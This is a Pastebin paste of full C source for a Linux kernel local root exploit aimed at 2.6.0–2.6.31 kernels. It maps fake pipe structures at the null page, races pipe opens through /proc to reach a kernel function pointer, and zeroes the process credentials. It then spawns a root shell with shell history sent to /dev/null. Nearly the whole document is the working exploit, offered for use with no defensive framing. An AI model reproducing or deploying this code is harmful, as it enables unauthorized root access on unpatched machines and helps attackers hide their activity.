API tools faq
paste
Guest User

exploit

a guest
Oct 27th, 2016
66
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.48 KB | None | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <fcntl.h>
  6. #include <signal.h>
  7. #include <stdint.h>
  8. #include <sched.h>
  9. #include <sys/types.h>
  10. #include <sys/utsname.h>
  11. #include <sys/stat.h>
  12. #include <sys/syscall.h>
  13. #include <sys/mman.h>
  14. #include <sys/personality.h>
  15.  
  16. /* First of all, im about to teach (hehe, just like mah nick) you mah powerful copy-and-past skillz */
  17.  
  18. // didn't really care about this. i mixed 2.6.0 to 2.6.31 :)
  19.  
  20. #define PIPE_BUFFERS (16)
  21.  
  22. struct __wait_queue_head {
  23. int spinlock;
  24.  
  25. void *next, *prev; // struct list_head
  26. };
  27.  
  28. struct fasync_struct { // bleh! didn't change from 2.6.0 to 2.6.31
  29. int magic;
  30. int fa_fd;
  31. struct fasync_struct *fa_next;
  32. void *file; // struct file
  33. };
  34.  
  35. // this iz the w00t about 2.6.11 to 2.6.31
  36. struct pipe_buf_operations {
  37. int suce;
  38. int *fptr[6];
  39. };
  40.  
  41.  
  42. // from 2.6.0 to 2.6.10
  43. struct pipe_inode_info_2600_10 {
  44. struct __wait_queue_head wait;
  45. char *base; // !!!!!
  46. unsigned int len; // !!!
  47. unsigned int start; // !!!
  48. unsigned int readers;
  49. unsigned int writers;
  50. unsigned int waiting_writers;
  51. unsigned int r_counter;
  52. unsigned int w_counter;
  53. struct fasync_struct *fasync_readers;
  54. struct fasync_struct *fasync_writers;
  55. };
  56.  
  57. // from 2.6.11 to 2.6.16
  58. struct pipe_buffer_2611_16 {
  59. void *suce;
  60. unsigned int offset, len;
  61. struct pipe_buf_operations *ops;
  62. };
  63.  
  64. struct pipe_inode_info_2611_16 {
  65. struct __wait_queue_head wait;
  66. unsigned int nrbufs, curbuf;
  67. struct pipe_buffer_2611_16 bufs[PIPE_BUFFERS];
  68. void *tmp_page;
  69. unsigned int start;
  70. unsigned int readers;
  71. unsigned int writers;
  72. unsigned int waiting_writers;
  73. unsigned int r_counter;
  74. unsigned int w_counter;
  75. struct fasync_struct *fasync_readers;
  76. struct fasync_struct *fasync_writers;
  77. };
  78.  
  79. // from 2.6.17 to 2.6.19
  80. struct pipe_buffer_2617_19 {
  81. void *suce;
  82. unsigned int offset, len;
  83. struct pipe_buf_operations *ops;
  84. unsigned int tapz;
  85. };
  86.  
  87. struct pipe_inode_info_2617_19 {
  88. struct __wait_queue_head wait;
  89. unsigned int nrbufs, curbuf;
  90. struct pipe_buffer_2617_19 bufs[PIPE_BUFFERS];
  91. void *tmp_page;
  92. unsigned int start;
  93. unsigned int readers;
  94. unsigned int writers;
  95. unsigned int waiting_writers;
  96. unsigned int r_counter;
  97. unsigned int w_counter;
  98. struct fasync_struct *fasync_readers;
  99. struct fasync_struct *fasync_writers;
  100. void *suce;
  101. };
  102.  
  103. // from 2.6.20 to 2.6.22
  104. struct pipe_buffer_2620_22 {
  105. void *suce;
  106. unsigned int offset, len;
  107. struct pipe_buf_operations *ops;
  108. unsigned int tapz;
  109. };
  110.  
  111. struct pipe_inode_info_2620_22 {
  112. struct __wait_queue_head wait;
  113. unsigned int nrbufs, curbuf;
  114. void *tmp_page;
  115. unsigned int start;
  116. unsigned int readers;
  117. unsigned int writers;
  118. unsigned int waiting_writers;
  119. unsigned int r_counter;
  120. unsigned int w_counter;
  121. struct fasync_struct *fasync_readers;
  122. struct fasync_struct *fasync_writers;
  123. void *suce;
  124. struct pipe_buffer_2620_22 bufs[PIPE_BUFFERS];
  125. };
  126.  
  127. // AND FINALY from 2.6.23 to 2.6.31 ... :))
  128. struct pipe_buffer_2623_31 {
  129. void *suce;
  130. unsigned int offset, len;
  131. struct pipe_buf_operations *ops;
  132. unsigned int tapz;
  133. unsigned long tg;
  134. };
  135.  
  136. struct pipe_inode_info_2623_31 {
  137. struct __wait_queue_head wait;
  138. unsigned int nrbufs, curbuf;
  139. void *tmp_page;
  140. unsigned int start;
  141. unsigned int readers;
  142. unsigned int writers;
  143. unsigned int waiting_writers;
  144. unsigned int r_counter;
  145. unsigned int w_counter;
  146. struct fasync_struct *fasync_readers;
  147. struct fasync_struct *fasync_writers;
  148. void *suce;
  149. struct pipe_buffer_2623_31 bufs[PIPE_BUFFERS];
  150. };
  151.  
  152.  
  153.  
  154. static pid_t uid;
  155. static gid_t gid;
  156. static int iz_kern2600_10;
  157. unsigned long taskstruct[1024];
  158. void gomu_gomu_nooooo_gatling_shell(void);
  159. int get_kern_version(void);
  160. void map_struct_at_null(void);
  161. void get_cur_task_and_escalate_priv(void);
  162. void* get_null_page(void);
  163. void error(char *s);
  164. int is_done(int new);
  165.  
  166. static inline void *get_4kstack_top()
  167. {
  168. void *stack;
  169.  
  170. __asm__ __volatile__ (
  171. "movl $0xfffff000,%%eax ;"
  172. "andl %%esp, %%eax ;"
  173. "movl %%eax, %0 ;"
  174. : "=r" (stack)
  175. );
  176. return stack;
  177. }
  178.  
  179. static inline void *get_8kstack_top()
  180. {
  181. void *stack;
  182.  
  183. __asm__ __volatile__ (
  184. "movl $0xffffe000,%%eax ;"
  185. "andl %%esp, %%eax ;"
  186. "movl %%eax, %0 ;"
  187. : "=r" (stack)
  188. );
  189. return stack;
  190. }
  191.  
  192. static inline void *get_current()
  193. {
  194. void *cur = *(void **)get_4kstack_top();
  195. if( ( (unsigned int *)cur >= (unsigned int *)0xc0000000 ) && ( *(unsigned int *)cur == 0 ) )
  196. return cur;
  197. else
  198. cur = *(void **)get_8kstack_top();
  199. return cur;
  200. }
  201.  
  202.  
  203.  
  204. void map_struct_at_null()
  205. {
  206. struct pipe_inode_info_2600_10 *pipe2600_10;
  207.  
  208. struct pipe_inode_info_2611_16 *pipe2611_16;
  209.  
  210. struct pipe_inode_info_2617_19 *pipe2617_19;
  211.  
  212. struct pipe_inode_info_2620_22 *pipe2620_22;
  213.  
  214. struct pipe_inode_info_2623_31 *pipe2623_31;
  215.  
  216. struct pipe_buf_operations luffy;
  217.  
  218.  
  219. FILE *f;
  220. unsigned int *sct_addr;
  221. unsigned int sc_addr;
  222. char dummy;
  223. char sname[256], pipebuf[10];
  224. int ret, i;
  225. void *page;
  226.  
  227. page = get_null_page();
  228. int version = get_kern_version();
  229.  
  230. luffy.suce = 1;
  231. for(i = 0; i < 6; i++)
  232. luffy.fptr[i] = (int *)get_cur_task_and_escalate_priv;
  233.  
  234. // ok lets go ...
  235. if(version >= 2600 && version <= 2610)
  236. {
  237. iz_kern2600_10 = 1;
  238.  
  239. /* we are going to ninja an obsolete syscall from teh sys_call_table: sys_olduname
  240. * i don't bother to restore it after owning the kernel. implement it if u want :p
  241. */
  242.  
  243. // hehe as u see, his imperial majesty spender haz alwayz good trickz
  244.  
  245. f = fopen("/proc/kallsyms", "r");
  246. if (f == NULL)
  247. {
  248. f = fopen("/proc/ksyms", "r");
  249. if (f == NULL)
  250. {
  251. error("0hn000es. i cant open /proc/{kall,k}syms for looking after teh sys_call_table addr. maybe u should set it yourself!");
  252. }
  253. }
  254.  
  255. ret = 0;
  256. while(ret != EOF)
  257. {
  258. ret = fscanf(f, "%p %c %s\n", (void **)&sct_addr, &dummy, sname);
  259. if (ret == 0)
  260. {
  261. fscanf(f, "%s\n", sname);
  262. continue;
  263. }
  264. if (!strcmp("sys_call_table", sname))
  265. {
  266. printf("\t\t+ sys_call_table is at %p\n",(void *)sct_addr);
  267. fclose(f);
  268. }
  269. }
  270.  
  271. if(f != NULL)
  272. {
  273. fclose(f);
  274. error("0hn000es. i cant get sys_olduname addr. maybe u should set it yourself!");
  275. }
  276.  
  277. sc_addr = (unsigned int) (sct_addr + __NR_olduname*sizeof(int));
  278.  
  279. pipe2600_10 = (struct pipe_inode_info_2600_10 *) page;
  280. memcpy(pipebuf, (char *) &sc_addr, sizeof(int));
  281. pipe2600_10->base = pipebuf;
  282. pipe2600_10->len = 0;
  283. pipe2600_10->start = 0;
  284. pipe2600_10->writers = 1;
  285. printf("\t\t+ Structs for kernels 2.6.0 => 2.6.10 were mapped\n");
  286.  
  287. }
  288.  
  289. else if(version >= 2611 && version <= 2616)
  290. {
  291. pipe2611_16 = (struct pipe_inode_info_2611_16 *) page;
  292. pipe2611_16->writers = 1;
  293. pipe2611_16->nrbufs = 1;
  294. for(i = 0; i < PIPE_BUFFERS; i++)
  295. pipe2611_16->bufs[i].ops = &luffy;
  296. printf("\t\t+ Structs for kernels 2.6.11 => 2.6.16 were mapped\n");
  297. }
  298.  
  299. else if(version >= 2617 && version <= 2619)
  300. {
  301. pipe2617_19 = (struct pipe_inode_info_2617_19 *) page;
  302. pipe2617_19->readers = 1;
  303. pipe2617_19->nrbufs = 1;
  304. for(i = 0; i < PIPE_BUFFERS; i++)
  305. pipe2617_19->bufs[i].ops = &luffy;
  306. pipe2617_19->wait.next = &pipe2617_19->wait.next;
  307. pipe2617_19->wait.spinlock = 1;
  308. printf("\t\t+ Structs for kernels 2.6.16 => 2.6.19 were mapped\n");
  309. }
  310.  
  311. else if(version >= 2620 && version <= 2622)
  312. {
  313. pipe2620_22 = (struct pipe_inode_info_2620_22 *) page;
  314. pipe2620_22->readers = 1;
  315. pipe2620_22->nrbufs = 1;
  316. for(i = 0; i < PIPE_BUFFERS; i++)
  317. pipe2620_22->bufs[i].ops = &luffy;
  318. pipe2620_22->wait.next = &pipe2620_22->wait.next;
  319. pipe2620_22->wait.spinlock = 1;
  320. printf("\t\t+ Structs for kernels 2.6.20 => 2.6.22 were mapped\n");
  321. }
  322.  
  323. else if(version >= 2623 && version <= 2631)
  324. {
  325. pipe2623_31 = (struct pipe_inode_info_2623_31 *) page;
  326. pipe2623_31->readers = 0;
  327. pipe2623_31->nrbufs = 0;
  328. for(i = 0; i < PIPE_BUFFERS; i++)
  329. pipe2623_31->bufs[i].ops = &luffy;
  330. pipe2623_31->wait.next = &pipe2623_31->wait.next;
  331. pipe2623_31->wait.spinlock = 1;
  332. printf("\t\t+ Structs for kernels 2.6.23 => 2.6.31 were mapped\n");
  333. }
  334.  
  335. else
  336. error("errrr! exploit not developped for ur kernel!");
  337.  
  338.  
  339.  
  340. }
  341.  
  342. int get_kern_version(void) // return something like 2600 for kernel 2.6.0, 2619 for kernel 2.6.19 ...
  343. {
  344. struct utsname buf;
  345. char second[2],third[3];
  346. int version = 2000;
  347. if(uname(&buf) < 0)
  348. error("can't have ur k3rn3l version. this box isn't for today :P\n");
  349. sprintf(second, "%c", buf.release[2]);
  350. second[1] = 0;
  351. version += atoi(second) * 100;
  352.  
  353. third[0] = buf.release[4];
  354. if(buf.release[5] >= '0' || buf.release[5] <= '9')
  355. {
  356. third[1] = buf.release[5];
  357. third[2] = 0;
  358. version += atoi(third);
  359. }
  360. else
  361. {
  362. third[1] = 0;
  363. version += third[0] - '0';
  364. }
  365.  
  366. printf("\t\t+ Kernel version %i\n", version);
  367.  
  368. return version;
  369.  
  370. }
  371.  
  372. // from our g0dz spender & julien :] lullz
  373. void* get_null_page(void)
  374. {
  375. void *page;
  376. if ((personality(0xffffffff)) != PER_SVR4)
  377. {
  378. page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  379. if (page != NULL)
  380. {
  381. page = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  382. if (page != NULL)
  383. {
  384. error("this box haz a motherfuckin mmap_min_addr-like stuff! burn it if u can !@#*");
  385. }
  386. }
  387. else
  388. {
  389. if (mprotect(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) < 0)
  390. {
  391. free(page);
  392. error("HELL! can't mprotect my null page !@#*. goto /dev/null !");
  393. }
  394. }
  395. }
  396. else
  397. {
  398. // may be we are lucky today ... :)
  399. page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  400. if (page != NULL)
  401. {
  402. page = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  403. if (page != NULL)
  404. {
  405. error("this box haz a motherfuckin mmap_min_addr-like stuff! burn it if u can !@#*");
  406. }
  407. }
  408. else
  409. {
  410. if (mprotect(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) // ... or not ! :(
  411. {
  412. free(page);
  413. error("HELL! can't mprotect my null page !@#*. goto /dev/null !");
  414. }
  415. }
  416. }
  417. printf("\t\t+ Got null page\n");
  418. return page;
  419. }
  420.  
  421. void gomu_gomu_nooooo_gatling_shell(void) // sgrakkyu & twiz are el8 :))
  422. {
  423. char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
  424. char *envp[] = { "TERM=linux", "PS1=blackbird\\$ ", "BASH_HISTORY=/dev/null",
  425. "HISTORY=/dev/null", "history=/dev/null",
  426. "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };
  427.  
  428. execve("/bin/sh", argv, envp);
  429. error("hheeeehhh! unable to spawn a sh");
  430. }
  431.  
  432.  
  433.  
  434. int is_done(int new)
  435. {
  436. static int done = 0;
  437. if (done == 1)
  438. return (1);
  439. done = new;
  440. }
  441.  
  442. volatile int done = 0;
  443.  
  444. void get_cur_task_and_escalate_priv()
  445. {
  446. uint32_t i;
  447. uint32_t *task = get_current();
  448. uint32_t *cred = 0;
  449.  
  450.  
  451. for(i=0; i<0x1000; i++)
  452. {
  453. if( (task[i] == task[i+1]) && (task[i+1] == task[i+2]) && (task[i+2] == task[i+3]))
  454. {
  455. task[i] = 0;
  456. task[i+1] = 0;
  457. task[i+2] = 0;
  458. task[i+3] = 0;
  459. is_done(1);
  460. return;
  461. }
  462. }
  463.  
  464. for (i = 0; i<1024; i++)
  465. {
  466. taskstruct[i] = task[i];
  467. cred = (uint32_t *)task[i];
  468. if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {
  469. cred++; /* Get ride of the cred's 'usage' field */
  470. if (cred[0] == uid && cred[1] == gid
  471. && cred[2] == uid && cred[3] == gid
  472. && cred[4] == uid && cred[5] == gid
  473. && cred[6] == uid && cred[7] == gid)
  474. {
  475. /* Get root */
  476. cred[0] = cred[2] = cred[4] = cred[6] = 0;
  477. cred[1] = cred[3] = cred[5] = cred[7] = 0;
  478. break;
  479. }
  480. }
  481. }
  482. is_done(1);
  483. }
  484.  
  485. int main(int ac, char **av)
  486. {
  487. int fd[2];
  488. int pid;
  489. char tapz[4];
  490.  
  491.  
  492. uid = getuid();
  493. gid = getgid();
  494. setresuid(uid, uid, uid);
  495. setresgid(gid, gid, gid);
  496.  
  497. map_struct_at_null();
  498.  
  499. //while (1)
  500. {
  501. pid = fork();
  502. if (pid == -1)
  503. {
  504. perror("fork");
  505. return (-1);
  506. }
  507. if (pid)
  508. {
  509. char path[1024];
  510. /* I assume next opened fd will be 4 */
  511. sprintf(path, "/proc/%d/fd/4", pid);
  512. while (!is_done(0))
  513. {
  514. fd[0] = open(path, O_RDWR);
  515. if (fd[0] != -1)
  516. {
  517. if(iz_kern2600_10)
  518. {
  519. memcpy(tapz, (char *)get_cur_task_and_escalate_priv, sizeof(int));
  520. write(fd[0], tapz, 4);
  521. }
  522. close(fd[0]);
  523. }
  524. }
  525. if(iz_kern2600_10)
  526. {
  527. syscall(__NR_olduname, NULL);
  528. }
  529. printf("\t\t+ Got root!\n");
  530. gomu_gomu_nooooo_gatling_shell();
  531. return (0);
  532. }
  533.  
  534. while (!is_done(0))
  535. {
  536. if (pipe(fd) != -1)
  537. {
  538. close(fd[0]);
  539. close(fd[1]);
  540. }
  541. }
  542. }
  543. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!